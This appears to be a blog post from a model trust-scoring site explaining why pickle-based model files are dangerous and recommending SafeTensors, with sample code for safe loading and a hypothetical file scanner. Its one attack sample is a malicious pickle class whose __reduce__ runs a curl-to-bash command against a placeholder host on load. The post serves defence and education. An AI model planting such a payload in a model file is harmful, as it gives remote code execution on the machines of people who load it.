When you download an AI model from HuggingFace or any other repository, you're placing significant trust in that model's creator. But what if the model file itself could execute arbitrary code on your machine? That's the reality of pickle files, and it's why HuggingHugh penalizes models that use them.
What Are Pickle Files?
Python's pickle module implements a serialization format that converts Python objects into byte streams. It's convenient for saving and loading complex data structures, including neural network weights. For years, PyTorch used .bin files (which are pickle-based) as the default format for saving model state dictionaries.
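To see what that legacy workflow looks like, here's a minimal sketch of saving and loading a state dictionary with PyTorch (the file name model.bin is illustrative):

```python
import torch
import torch.nn as nn

model = nn.Linear(4, 2)

# torch.save pickles the state dict under the hood, which is why
# legacy .bin checkpoints are really pickle files
torch.save(model.state_dict(), 'model.bin')

# torch.load unpickles the file when the weights come back in
state_dict = torch.load('model.bin')
```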
The problem? Pickle files can contain arbitrary Python code that executes automatically when the file is loaded.
The Security Risk
Here's a simplified example of how malicious pickle files work:
```python
import os
import pickle

class Malicious:
    def __reduce__(self):
        # pickle calls __reduce__ to learn how to rebuild an object;
        # returning (os.system, args) makes unpickling run a shell command
        return (os.system, ('curl evil.com/steal.sh | bash',))

# This creates a "model" that runs commands when loaded
with open('model.bin', 'wb') as f:
    pickle.dump(Malicious(), f)
```
When someone loads this "model" with torch.load(), the unpickling step executes the malicious code immediately; a defensive-loading sketch follows the list below. The attacker could:
- Steal credentials from environment variables
- Install cryptocurrency miners on your GPU
- Exfiltrate training data or proprietary datasets
- Establish persistent backdoors in your infrastructure
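On the PyTorch side, one mitigation is to refuse arbitrary objects at load time. Here's a minimal sketch using the weights_only flag that torch.load has accepted since PyTorch 1.13 (and that PyTorch 2.6 made the default):

```python
import torch

# weights_only=True restricts unpickling to tensors and plain data
# types, so a __reduce__ payload raises an error instead of running
try:
    state = torch.load('model.bin', weights_only=True)
except Exception as exc:  # pickle payloads surface as UnpicklingError
    print(f'Refused to load untrusted checkpoint: {exc}')
```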
Real-World Incidents
This isn't theoretical. Security researchers have demonstrated pickle-based attacks against ML pipelines, and the HuggingFace community has dealt with malicious model uploads. The platform now scans for obvious threats, but sophisticated attacks can evade detection.
The SafeTensors Solution
SafeTensors is a serialization format developed by Hugging Face specifically for ML model weights; a short usage sketch follows this list. Unlike pickle, it:
- Cannot execute code - it's a pure data format
- Supports zero-copy loading - faster model loading
- Works across frameworks - PyTorch, TensorFlow, JAX, etc.
- Validates on load - corrupted files fail safely
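Here's a minimal round trip using the safetensors package (the file name model.safetensors is illustrative):

```python
import torch
from safetensors.torch import save_file, load_file

tensors = {'weight': torch.randn(2, 4), 'bias': torch.zeros(2)}

# save_file writes a flat dict of named tensors; no code is serialized
save_file(tensors, 'model.safetensors')

# load_file validates the header before mapping in the tensor data
loaded = load_file('model.safetensors')
print(loaded['weight'].shape)  # torch.Size([2, 4])
```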
Most major model providers now offer SafeTensors versions of their models, and HuggingFace recommends it as the default format.
How HuggingHugh Evaluates This
Our trust scoring system includes two factors related to serialization safety:
- SafeTensors Usage (18 points): Models that exclusively use SafeTensors get full marks. Models with both SafeTensors and pickle get partial credit. Pickle-only models get zero.
- No Pickle Files (18 points): We check for the presence of any `.bin`, `.pkl`, or `.pickle` files in the repository. Models without these risky formats score higher. (A sketch of this kind of check follows the list.)
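This isn't HuggingHugh's actual implementation, but a hypothetical sketch of how such a check could work against a public repository, assuming the huggingface_hub package; the point values mirror the two factors above:

```python
from huggingface_hub import list_repo_files

RISKY_EXTENSIONS = ('.bin', '.pkl', '.pickle')

def serialization_score(repo_id: str) -> int:
    """Hypothetical scorer mirroring the two 18-point factors above."""
    files = list_repo_files(repo_id)
    has_safetensors = any(f.endswith('.safetensors') for f in files)
    has_pickle = any(f.endswith(RISKY_EXTENSIONS) for f in files)

    score = 0
    # SafeTensors usage: full marks only if no pickle files coexist
    if has_safetensors:
        score += 18 if not has_pickle else 9
    # No pickle files: all-or-nothing
    if not has_pickle:
        score += 18
    return score

print(serialization_score('bert-base-uncased'))
```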
Together, these factors account for 36% of the total trust score, reflecting how seriously we take serialization security.
What You Should Do
- Prefer SafeTensors models when available (look for `.safetensors` files; a loading helper in this spirit is sketched after the list)
- Check HuggingHugh for trust scores before downloading
- Never load pickle files from untrusted sources
- Run models in sandboxed environments when possible
- Keep your ML libraries updated for security patches
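To make the first and third points concrete, here's a purely illustrative helper that loads `.safetensors` files and refuses anything pickle-based; the function name and policy are assumptions, not a standard API:

```python
from pathlib import Path

from safetensors.torch import load_file

RISKY_SUFFIXES = {'.bin', '.pkl', '.pickle'}

def load_weights_safely(path: str) -> dict:
    """Hypothetical helper: load SafeTensors, refuse pickle formats."""
    p = Path(path)
    if p.suffix in RISKY_SUFFIXES:
        raise ValueError(
            f'{p.name} is a pickle-based file; refusing to load. '
            'Look for a .safetensors version instead.'
        )
    if p.suffix != '.safetensors':
        raise ValueError(f'Unrecognized weight format: {p.suffix}')
    return load_file(str(p))
```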
Conclusion
The AI community is moving toward safer serialization formats, but the transition isn't complete. Until then, tools like HuggingHugh help you identify which models prioritize security. A model that still uses pickle in 2025 might not be malicious, but it does suggest the maintainers aren't following security best practices.
Check your favorite models on our dashboard and see how they score.